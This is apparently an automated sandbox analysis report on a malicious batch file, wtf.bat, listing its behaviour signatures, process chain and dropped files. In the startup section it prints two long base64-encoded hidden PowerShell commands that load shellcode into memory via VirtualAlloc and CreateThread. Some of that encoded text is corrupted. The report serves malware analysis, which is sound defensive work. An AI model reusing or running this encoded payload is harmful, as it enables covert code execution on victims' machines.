ID: 6036 Sample Name: wtf.bat Cookbook: default.jbs Time: 18:32:35 Date: 19/05/2018 Version:

Table of Contents
  Analysis Report
    Overview
      General Information
      Detection
      Confidence
      Classification
    Signature Overview
      Networking
      Data Obfuscation
      Spreading
      System Summary
      HIPS / PFW / Operating System Protection Evasion
      Anti Debugging
      Malware Analysis System Evasion
      Hooking and other Techniques for Hiding and Protection
      Language, Device and Operating System Detection
    Behavior Graph
    Simulations
      Behavior and APIs
    Antivirus Detection
      Initial Sample
      Dropped Files
      Unpacked PE Files
      Domains
      URLs
    Yara Overview
      Initial Sample
      PCAP (Network Traffic)
      Dropped Files
      Memory Dumps
      Unpacked PEs
    Joe Sandbox View / Context
      IPs
      Domains
      ASN
      Dropped Files
    Screenshots
    Startup
    Created / dropped Files
    Contacted Domains/Contacted IPs
      Contacted Domains
      Contacted IPs
    Static File Info
      General
      File Icon
    Network Behavior
    Code Manipulations
    Statistics
      Behavior
    System Behavior
      Analysis Process: cmd.exe PID: 3464 Parent PID: 302
        General
        File Activities
          File Read
      Analysis Process: powershell.exe PID: 3492 Parent PID: 3464
        General
        File Activities
          File Read
      Analysis Process: powershell.exe PID: 3544 Parent PID: 3492
        General
        File Activities
          File Created
          File Deleted
          File Written
          File Read
      Analysis Process: csc.exe PID: 3596 Parent PID: 3544
        General
    Disassembly
      Code Analysis

Copyright Joe Security LLC 2018

Analysis Report
Overview
General Information
Joe Sandbox Version:
Analysis ID: 6036
Start time: 18:32:35
Start date: 19/05/2018
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 57s
Hypervisor based Inspection enabled:
Report type: light
Sample file name: wtf.bat
Cookbook file name: default.jbs
Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java )
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabled, EGA enabled, HDC enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal4.evad.winbat@7/6@0/0
HCA Information: Successful, ratio: 100%
  Number of executed functions: 0
  Number of non-executed functions: 0
EGA Information: Failed
HDC Information: Failed
Cookbook Comments:
  Adjust boot time
  Correcting counters for adjusted boot time
  Found application associated with file extension: .bat
Warnings:
  Exclude process from analysis (whitelisted): conhost.exe, dllhost.exe
  Report size exceeded maximum capacity and may have missing behavior information.
  Report size getting too big, too many NtOpenKeyEx calls found.
  Report size getting too big, too many NtQueryValueKey calls found.
  Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe, powershell.exe, csc.exe
Detection
[score gauge: Strategy, Score Range, Reporting, Detection Threshold, Report FP / FN]

Confidence
[score gauge: Strategy, Score Range, Further Analysis Required?, Threshold]
Classification
[radar chart; axes: Ransomware, Miner, Spreading, Evader, Phishing, Exploiter, Banker, Spyware, Trojan / Bot, Adware; rings: malicious, suspicious, clean]

Signature Overview
Networking:
  - Urls found in memory or binary data
Data Obfuscation:
  - Compiles C# or VB.Net code
Spreading:
  - Enumerates the file system
System Summary:
  - Very long command line found
  - Classification label
  - Creates files inside the user directory
  - Creates temporary files
  - Executes batch files
  - Found command line output
  - Parts of this application are using the .net runtime (probably coded in C#)
  - Reads ini files
  - Reads software policies
  - Spawns processes
  - Uses an in-process (OLE) Automation server
  - Uses Microsoft Silverlight
  - Uses new MSVCR Dlls
  - Binary contains paths to debug symbols
HIPS / PFW / Operating System Protection Evasion:
  - Encrypted powershell cmdline option found
  - Very long cmdline option found, this is very uncommon (may be encrypted or packed)
  - May try to detect the Windows Explorer process (often used for injection)
Anti Debugging:
  - Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
  - Enables debug privileges

  - Creates guard pages, often used to prevent reverse engineering and debugging
Malware Analysis System Evasion:
  - Contains long sleeps (>= 3 min)
  - Enumerates the file system
  - May sleep (evasive loops) to hinder dynamic analysis
  - Queries a list of all running processes
Hooking and other Techniques for Hiding and Protection:
  - Disables application error messages (SetErrorMode)
Language, Device and Operating System Detection:
  - Queries the installation date of Windows
  - Queries the volume information (name, serial number etc) of a device
  - Queries the cryptographic machine GUID
Behavior Graph
ID: 6036  Sample: wtf.bat  Startdate: 19/05/2018  Architecture: WINDOWS  Score: 4
Legend: Process; Signature; Created File; DNS/IP Info; Is Dropped; Is Windows Process; Number of created Registry Values; Number of created Files; Visual Basic; Delphi; Java; .Net C# or VB.NET; C, C++ or other language; Is malicious
Signature nodes on the graph: Very long command line found; Encrypted powershell cmdline option found
Process chain (edges are "started"):
  cmd.exe
    started powershell.exe (6)
      started powershell.exe (13)
        started csc.exe
Simulations
Behavior and APIs

Time | Type | Description
18:33:4 | API Interceptor | 2x Sleep call for process: powershell.exe modified
18:33:53 | API Interceptor | 1x Sleep call for process: csc.exe modified
Antivirus Detection
Initial Sample: No Antivirus matches
Dropped Files: No Antivirus matches
Unpacked PE Files: No Antivirus matches
Domains: No Antivirus matches
URLs: No Antivirus matches
Yara Overview
Initial Sample: No yara matches
PCAP (Network Traffic): No yara matches
Dropped Files: No yara matches
Memory Dumps: No yara matches
Unpacked PEs: No yara matches
Joe Sandbox View / Context
IPs: No context
Domains:

No context
ASN: No context
Dropped Files: No context
Screenshots
Startup
System is w7
cmd.exe (PID: 3464 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\Desktop\wtf.bat' ' MD5: AD7B9C1403B52BC532FBA594342B9)
powershell.exe (PID: 3492 cmdline: powershell -nop -win Hidden -noni -enc JAAxACAAPQAgACcAJABjACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAGAcgB0A CgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgA FYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1A GkAbgB0ACAAZgBsAEEAbABsAGAYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwA GAcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQA HQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpA G4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByA CAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAGAbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwA FQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhA HQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByA

10 GMALAAgAHUAaQBuAHQAIABjAGAdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpA HQAaQBvAG4AIAAkAGMAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvA G4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAcwBjACAAPQAgADAAeABmAGMALAAwAHgAZQA4A CwAMAB4ADgAMgAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAA2ADAALAAwAHgAOAA5ACwAMAB4AGUANQAsADAAeAAzADEALAA wahgaywawacwamab4adyanaasadaaeaa4agialaawahganqawacwamab4admamaasadaaeaa4agialaawahganqayacwamab4adaaywasadaaeaa4agialaa wahganqayacwamab4adeanaasadaaeaa4agialaawahganwayacwamab4adiaoaasadaaeaawagyalaawahgayga3acwamab4adqayqasadaaeaayadyalaa wahgamwaxacwamab4agyazgasadaaeabhagmalaawahgamwbjacwamab4adyamqasadaaeaa3agmalaawahgamaayacwamab4adiaywasadaaeaayadaalaa wahgaywaxacwamab4agmazgasadaaeaawagqalaawahgamaaxacwamab4agmanwasadaaeabladialaawahgazgayacwamab4aduamgasadaaeaa1adcalaa wahgaoabiacwamab4aduamgasadaaeaaxadaalaawahgaoabiacwamab4adqayqasadaaeaazagmalaawahgaoabiacwamab4adqaywasadaaeaaxadealaa wahganwa4acwamab4aguamwasadaaeaa0adgalaawahgamaaxacwamab4agqamqasadaaeaa1adealaawahgaoabiacwamab4aduaoqasadaaeaayadaalaa wahgamaaxacwamab4agqamwasadaaeaa4agialaawahganaa5acwamab4adeaoaasadaaeabladmalaawahgamwbhacwamab4adqaoqasadaaeaa4agialaa wahgamwa0acwamab4adgaygasadaaeaawadealaawahgazaa2acwamab4admamqasadaaeabmagyalaawahgayqbjacwamab4agmamqasadaaeabjagyalaa wahgamabkacwamab4adaamqasadaaeabjadcalaawahgamwa4acwamab4aguamaasadaaeaa3adualaawahgazga2acwamab4adaamwasadaaeaa3agqalaa wahgazga4acwamab4admaygasadaaeaa3agqalaawahgamga0acwamab4adcanqasadaaeabladqalaawahganqa4acwamab4adgaygasadaaeaa1adgalaa wahgamga0acwamab4adaamqasadaaeabkadmalaawahganga2acwamab4adgaygasadaaeaawagmalaawahganabiacwamab4adgaygasadaaeaa1adgalaa wahgamqbjacwamab4adaamqasadaaeabkadmalaawahgaoabiacwamab4adaanaasadaaeaa4agialaawahgamaaxacwamab4agqamaasadaaeaa4adkalaa 
wahganaa0acwamab4adianaasadaaeaayadqalaawahganqbiacwamab4aduaygasadaaeaa2adealaawahganqa5acwamab4aduayqasadaaeaa1adealaa wahgazgbmacwamab4aguamaasadaaeaa1agyalaawahganqbmacwamab4aduayqasadaaeaa4agialaawahgamqayacwamab4aguaygasadaae AA4AGQALAAwAHgANQBkACwAMAB4ADYAOAAsADAAeAAzADMALAAwAHgAMwAyACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4ADcANwAsADAAe AA3ADMALAAwAHgAMwAyACwAMAB4ADUAZgAsADAAeAA1ADQALAAwAHgANgA4ACwAMAB4ADQAYwAsADAAeAA3ADcALAAwAHgAMgA2ACwAMAB4ADAANwAsADAAe ABmAGYALAAwAHgAZAA1ACwAMAB4AGIAOAAsADAAeAA5ADAALAAwAHgAMAAxACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMgA5ACwAMAB4AGMANAAsADAAe AA1ADQALAAwAHgANQAwACwAMAB4ADYAOAAsADAAeAAyADkALAAwAHgAOAAwACwAMAB4ADYAYgAsADAAeAAwADAALAAwAHgAZgBmACwAMAB4AGQ ANQAsADAAeAA2AGEALAAwAHgAMABhACwAMAB4ADYAOAAsADAAeABjADAALAAwAHgAYQA4ACwAMAB4ADAAMQAsADAAeABhAGMALAAwAHgANgA4ACwAMAB4ADA AMgAsADAAeAAwADAALAAwAHgAMAAxACwAMAB4AGIAYQAsADAAeAA4ADkALAAwAHgAZQA2ACwAMAB4ADUAMAAsADAAeAA1ADAALAAwAHgANQAwACwAMAB4ADU AMAAsADAAeAA0ADAALAAwAHgANQAwACwAMAB4ADQAMAAsADAAeAA1ADAALAAwAHgANgA4ACwAMAB4AGUAYQAsADAAeAAwAGYALAAwAHgAZABmA CwAMAB4AGUAMAAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADkANwAsADAAeAA2AGEALAAwAHgAMQAwACwAMAB4ADUANgAsADAAeAA1ADcALAAwAHgANgA4A CwAMAB4ADkAOQAsADAAeABhADUALAAwAHgANwA0ACwAMAB4ADYAMQAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA0A CwAMAB4ADAAYwAsADAAeABmAGYALAAwAHgANABlACwAMAB4ADAAOAAsADAAeAA3ADUALAAwAHgAZQBjACwAMAB4ADYAOAAsADAAeABmADAALAAwAHgAYgA1A CwAMAB4AGEAMgAsADAAeAA1ADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA2AGEALAAwAHgAMAAwACwAMAB4ADYAYQAsADAAeAAwADQALAA wahganqa2acwamab4aduanwasadaaeaa2adgalaawahgamaayacwamab4agqaoqasadaaeabjadgalaawahganqbmacwamab4agyazgasadaaeabkadualaa wahgaoabiacwamab4admangasadaaeaa2agealaawahganaawacwamab4adyaoaasadaaeaawadaalaawahgamqawacwamab4adaamaasadaae AAwADAALAAwAHgANQA2ACwAMAB4ADYAYQAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4ADUAOAAsADAAeABhADQALAAwAHgANQAzACwAMAB4AGU ANQAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADkAMwAsADAAeAA1ADMALAAwAHgANgBhACwAMAB4ADAAMAAsADAAeAA1ADYALAAwAHgANQAzACwAMAB4ADU 
ANwAsADAAeAA2ADgALAAwAHgAMAAyACwAMAB4AGQAOQAsADAAeABjADgALAAwAHgANQBmACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAMAAxACwAMAB4AGM AMwAsADAAeAAyADkALAAwAHgAYwA2ACwAMAB4ADcANQAsADAAeABlAGUALAAwAHgAYwAzADsAJABzAGkAegBlACAAPQAgADAAeAAxADAAMAAwADsAaQBmACA AKAAkAHMAYwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABzAGkAegBlACAAPQAgACQAcwBjAC4ATABlAG4AZwB0AGgAfQA7ACQ AeAA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAHMAaQB6AGUALAAwAHgANAAwACkAOwBmAGAcgAgACg AJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHMAYwAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACg AWwBJAG4AdABQAHQAcgBdACgAJAB4AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJABzAGMAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEM AcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAHgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGU AcAAgADYAMAB9ADsAJwA7ACQAZwBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAGAbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4 AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkADE AKQApADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAHgAOAA2ACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGU AbQBSAGAbwB0ACAAKwAgACIAXABzAHkAcwB3AGAdwA2ADQAXABXAGkAbgBkAGAdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHc AZQByAHMAaABlAGwAbAAiADsAJABjAG0AZAAgAD0AIAAiAC0AbgBvAHAAIAAtAG4AbwBuAGkAIAAtAGUAbgBjACAAIgA7AGkAZQB4ACAAIgAmACAAJAB4ADg ANgAgACQAYwBtAGQAIAAkAGcAcQAiAH0AZQBsAHMAZQB7ACQAYwBtAGQAIAA9ACAAIgAtAG4AbwBwACAALQBuAGAbgBpACAALQBlAG4AYwAiADsAaQBlAHg AIAAiACYAIABwAGAdwBlAHIAcwBoAGUAbABsACAAJABjAG0AZAAgACQAZwBxACIAOwB9AA== MD5: 92F44E405DB16AC55D97E3BFE3B132FA) powershell.exe (PID: 3544 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop -noni -enc JABjACAAPQAgACcAWwBEAGwAbABJAG0AcA BvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUA 
B0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAGAYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQ AsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAGAdABlAGMAdAApADsA WwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUA cgbuacaasqbuahqauab0ahiaiabdahiazqbhahqazqbuaggacgblageazaaoaekabgb0afaadabyacaababwafqaaabyaguayqbkaeeadab0ahiaaqbiahua dablahmalaagahuaaqbuahqaiabkahcauwb0ageaywbrafmaaqb6agualaagaekabgb0afaadabyacaababwafmadabhahiadabbagqazabyaguacwbzacwa IABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4A dabqahqacgagagwacabuaggacgblageazabjagqakqa7afsarabsagwasqbtahaabwbyahqakaaiag0acwb2agmacgb0ac4azabsagwaigapaf0acab1agia babpagmaiabzahqayqb0agkaywagaguaeab0aguacgbuacaasqbuahqauab0ahiaiabtaguabqbzaguadaaoaekabgb0afaadabyacaazablahmadaasacaa dqbpag4adaagahmacgbjacwaiab1agkabgb0acaaywbvahuabgb0ackaowanadsajab3acaapqagaeeazabkac0avab5ahaazqagac0abqblag0aygblahia RABlAGYAaQBuAGkAdABpAGAbgAgACQAYwAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYA dqbuagmadabpagabgbzacaalqbwageacwbzahqaaabyahuaowbbaeiaeqb0aguawwbdaf0aowbbaeiaeqb0aguawwbdaf0ajabzagmaiaa9ac AAMAB4AGYAYwAsADAAeABlADgALAAwAHgAOAAyACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAMAAsADAAeAA4ADkALAAw AHgAZQA1ACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgANgA0ACwAMAB4ADgAYgAsADAAeAA1ADAALAAwAHgAMwAwACwAMAB4ADgAYgAsADAAeA A1ADIALAAwAHgAMABjACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQA0ACwAMAB4ADgAYgAsADAAeAA3ADIALAAwAHgAMgA4ACwAMAB4ADAAZgAsADAAeA BiADcALAAwAHgANABhACwAMAB4ADIANgAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4AGEAYwAsADAAeAAzAGMALAAwAHgANgAxACwAMAB4ADcA YwAsADAAeAAwADIALAAwAHgAMgBjACwAMAB4ADIAMAAsADAAeABjADEALAAwAHgAYwBmACwAMAB4ADAAZAAsADAAeAAwADEALAAwAHgAYwA3AC wamab4aguamgasadaaeabmadialaawahganqayacwamab4aduanwasadaaeaa4agialaawahganqayacwamab4adeamaasadaaeaa4agialaaw 
AHgANABhACwAMAB4ADMAYwAsADAAeAA4AGIALAAwAHgANABjACwAMAB4ADEAMQAsADAAeAA3ADgALAAwAHgAZQAzACwAMAB4ADQAOAAsADAAeA AwADEALAAwAHgAZAAxACwAMAB4ADUAMQAsADAAeAA4AGIALAAwAHgANQA5ACwAMAB4ADIAMAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgA YgAsADAAeAA0ADkALAAwAHgAMQA4ACwAMAB4AGUAMwAsADAAeAAzAGEALAAwAHgANAA5ACwAMAB4ADgAYgAsADAAeAAzADQALAAwAHgAOABiAC wamab4adaamqasadaaeabkadyalaawahgamwaxacwamab4agyazgasadaaeabhagmalaawahgaywaxacwamab4agmazgasadaaeaawagqalaaw AHgAMAAxACwAMAB4AGMANwAsADAAeAAzADgALAAwAHgAZQAwACwAMAB4ADcANQAsADAAeABmADYALAAwAHgAMAAzACwAMAB4ADcAZAAsADAAeA BmADgALAAwAHgAMwBiACwAMAB4ADcAZAAsADAAeAAyADQALAAwAHgANwA1ACwAMAB4AGUANAAsADAAeAA1ADgALAAwAHgAOABiACwAMAB4ADUA OAAsADAAeAAyADQALAAwAHgAMAAxACwAMAB4AGQAMwAsADAAeAA2ADYALAAwAHgAOABiACwAMAB4ADAAYwAsADAAeAA0AGIALAAwAHgAOABiAC wamab4aduaoaasadaaeaaxagmalaawahgamaaxacwamab4agqamwasadaaeaa4agialaawahgamaa0acwamab4adgaygasadaaeaawadealaaw AHgAZAAwACwAMAB4ADgAOQAsADAAeAA0ADQALAAwAHgAMgA0ACwAMAB4ADIANAAsADAAeAA1AGIALAAwAHgANQBiACwAMAB4ADYAMQAsADAAeA A1ADkALAAwAHgANQBhACwAMAB4ADUAMQAsADAAeABmAGYALAAwAHgAZQAwACwAMAB4ADUAZgAsADAAeAA1AGYALAAwAHgANQBhACwAMAB4ADgA YgAsADAAeAAxADIALAAwAHgAZQBiACwAMAB4ADgAZAAsADAAeAA1AGQALAAwAHgANgA4ACwAMAB4ADMAMwAsADAAeAAzADIALAAwAHgAMAAwAC wamab4adaamaasadaaeaa2adgalaawahganwa3acwamab4adcamwasadaaeaazadialaawahganqbmacwamab4aduanaasadaaeaa2adgalaaw AHgANABjACwAMAB4ADcANwAsADAAeAAyADYALAAwAHgAMAA3ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAYgA4ACwAMAB4ADkAMAAsADAAeA AwADEALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeAAyADkALAAwAHgAYwA0ACwAMAB4ADUANAAsADAAeAA1ADAALAAwAHgANgA4ACwAMAB4ADIA OQAsADAAeAA4ADAALAAwAHgANgBiACwAMAB4ADAAMAAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADYAYQAsADAAeAAwAGEALAAwAHgANgA4AC wamab4agmamaasadaaeabhadgalaawahgamaaxacwamab4ageaywasadaaeaa2adgalaawahgamaayacwamab4adaamaasadaaeaawadealaaw AHgAYgBhACwAMAB4ADgAOQAsADAAeABlADYALAAwAHgANQAwACwAMAB4ADUAMAAsADAAeAA1ADAALAAwAHgANQAwACwAMAB4ADQAMAAsADAAeA A1ADAALAAwAHgANAAwACwAMAB4ADUAMAAsADAAeAA2ADgALAAwAHgAZQBhACwAMAB4ADAAZgAsADAAeABkAGYALAAwAHgAZQAwACwAMAB4AGYA 
ZgAsADAAeABkADUALAAwAHgAOQA3ACwAMAB4ADYAYQAsADAAeAAxADAALAAwAHgANQA2ACwAMAB4ADUANwAsADAAeAA2ADgALAAwAHgAOQA5AC wamab4ageanqasadaaeaa3adqalaawahgangaxacwamab4agyazgasadaaeabkadualaawahgaoaa1acwamab4agmamaasadaaeaa3adqalaaw AHgAMABjACwAMAB4AGYAZgAsADAAeAA0AGUALAAwAHgAMAA4ACwAMAB4ADcANQAsADAAeABlAGMALAAwAHgANgA4ACwAMAB4AGYAMAAsADAAeA BiADUALAAwAHgAYQAyACwAMAB4ADUANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADYAYQAsADAAeAAwADAALAAwAHgANgBhACwAMAB4ADAA NAAsADAAeAA1ADYALAAwAHgANQA3ACwAMAB4ADYAOAAsADAAeAAwADIALAAwAHgAZAA5ACwAMAB4AGMAOAAsADAAeAA1AGYALAAwAHgAZgBmAC wamab4agqanqasadaaeaa4agialaawahgamwa2acwamab4adyayqasadaaeaa0adaalaawahganga4acwamab4adaamaasadaaeaaxadaalaaw

AHgAMAAwACwAMAB4ADAAMAAsADAAeAA1ADYALAAwAHgANgBhACwAMAB4ADAAMAAsADAAeAA2ADgALAAwAHgANQA4ACwAMAB4AGEANAAsADAAeA A1ADMALAAwAHgAZQA1ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgAOQAzACwAMAB4ADUAMwAsADAAeAA2AGEALAAwAHgAMAAwACwAMAB4ADUA NgAsADAAeAA1ADMALAAwAHgANQA3ACwAMAB4ADYAOAAsADAAeAAwADIALAAwAHgAZAA5ACwAMAB4AGMAOAAsADAAeAA1AGYALAAwAHgAZgBmAC wamab4agqanqasadaaeaawadealaawahgaywazacwamab4adiaoqasadaaeabjadyalaawahganwa1acwamab4aguazqasadaaeabjadmaowak AHMAaQB6AGUAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAcwBjAC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAHMAaQB6 AGUAIAA9ACAAJABzAGMALgBMAGUAbgBnAHQAaAB9ADsAJAB4AD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAGAYwAoADAALAAwAHgAMQ AwADAAMAAsACQAcwBpAHoAZQAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAcwBjAC4ATABlAG4AZwB0AGgALQ AxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAHgALgBUAGASQBuAHQAMwAyACgAKQArACQAaQ ApACwAIAAkAHMAYwBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAeAAsADAA LAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwA= MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
csc.exe (PID: 3596 cmdline: 'C:\Windows\Microsoft.NET\Framework\v \csc.exe' /noconfig MD5: 0A1C1BDCB030222A0B0A652B2C9DD)
Created / dropped Files
C:\Users\user\AppData\Local\Temp\onkbqua.0.cs
  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  File Type: UTF-8 Unicode (with BOM) text, with very long lines
  Size (bytes): 557
  Entropy (bit):
  Encrypted:
  MD5 / SHA1 / SHA-256 / SHA-512: C34DAA5F6F2ECE2DFC07119EE F26A4A451A560E93CB7736F5B C B240A9BB4F72D6522E19FA40B9C6FA94C1BD6DC7B715F94E A5DC 34169FC9FB0CD231C45EFCD22EC1BC659EF513E73BC4C7BCB91CA1D5129A1A149E9F75297ACB495E52FF04D 75E6E121232DBC E41B63F10AA3E1D6BD
  Malicious:
  Reputation: low
C:\Users\user\AppData\Local\Temp\onkbqua.cmdline
  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  File Type: UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
  Size (bytes): 327
  Entropy (bit):
  Encrypted:
  MD5 / SHA1 / SHA-256 / SHA-512: 6D04FDAE432CFC7221FB7A4B7242E4 6607DCFBB91724E3BAD056BDBDD775C57AB11DB B6AD2760D27B37F390D2B930A75EACA362F5E15995A0E9631A0C7992B BAF4D26F0D99A95DDA67D6FE16CC6D06604E4B1CF260C93FB7507D4B D13F1341BAE99C13E2A3 0AD A1E17A0CE931E52AC59A
  Malicious:
  Reputation: low
C:\Users\user\AppData\Local\Temp\onkbqua.out
  Process: C:\Windows\Microsoft.NET\Framework\v \csc.exe
  File Type: ASCII text, with CRLF line terminators
  Size (bytes): 154
  Entropy (bit):
  Encrypted:
  MD5 / SHA1 / SHA-256 / SHA-512: F66EE7F06DDB2C5B99B505F0BA4D202 33C6B2DE1BC47C6F5DE16096DC96EA00171F5A 1C24532FE4D9F94E09BA40E456F9019BD49C2F3CD4DD155AE06BDDF339F45BE 641B10FB4FBE04457A49079F7017A91C6A1F59A9CD3F031DB7E34D0969B11FE59C3E945C0E A 46F74E2C2E74797ECFDBFECBEAD
  Malicious:
  Reputation: low
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DYF4J0F10SJFZIWS3XI2.temp
  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  File Type: data
  Size (bytes): 016
  Entropy (bit):
  Encrypted:
  MD5: 5D769E55DE2CB077F904D6FB4007EF4
  SHA1: 9F45FF074C1259EC6C316F05FE97051A10
  SHA-256: 3DCD539A20C463CD DF250ABC993190C7CAD E76D9D
